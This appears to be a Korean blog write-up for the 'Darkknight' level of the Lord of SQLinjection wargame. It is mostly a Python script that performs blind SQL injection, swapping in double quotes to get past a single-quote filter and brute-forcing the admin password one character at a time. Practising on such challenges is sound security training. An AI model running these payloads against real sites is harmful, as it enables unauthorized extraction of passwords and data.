LOS(los.rubiya.kr) Darkknight
이번 문제도 Blind SQLi 문제 다만 필터링이 조금 더 생겼다. 기존에 풀던 스크립트에 영향을 주는건 싱글 쿼터(')를 못쓴다는건데 이는 간단하게 더블 쿼터(")로 대체할 수 있다. 그것 외에는 그냥 기존 스크립트 그대로 사용해도 된다.
...더보기
import urllib2
import requests
flag = ""
length = 0
i = 1
session = dict(PHPSESSID = "qt55vvaetoc7mrikuq8qjmopr5")
url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php??pw="
while True:
q = url + "1&no=1 || id like \"admin\"%26%26 length(pw) like "+str(i)+"%23"
print 'TEST #',i
print q
r = requests.post(q, cookies=session)
if 'Hello admin' in r.text:
length = i
break
i = i + 1
print " PASSWORD LENGTH : ", length
for j in range(1, length +1):
for i in range(48,123):
q = url + "1&no=1 || id like \"admin\"%26%26mid(pw, "+str(j)+",1) like "+"\""+chr(i)+"\""+"%23"
print 'TEST #', j, '-', i
print q
r = requests.post(q,cookies=session)
if 'Hello admin' in r.text:
flag += chr(i)
print "FLAG : ",flag
break
'Web Hacking > los.rubiya.kr' 카테고리의 다른 글
[Lord of SQLinjection] Giant (0) | 2019.08.26 |
---|---|
[Lord of SQLinjection] Bugbear (0) | 2019.08.26 |
[Lord of SQLinjection] Golem (0) | 2019.08.26 |
[Lord of SQLinjection] Skeleton (0) | 2019.08.18 |
[Lord of SQLinjection] Vampire (0) | 2019.08.18 |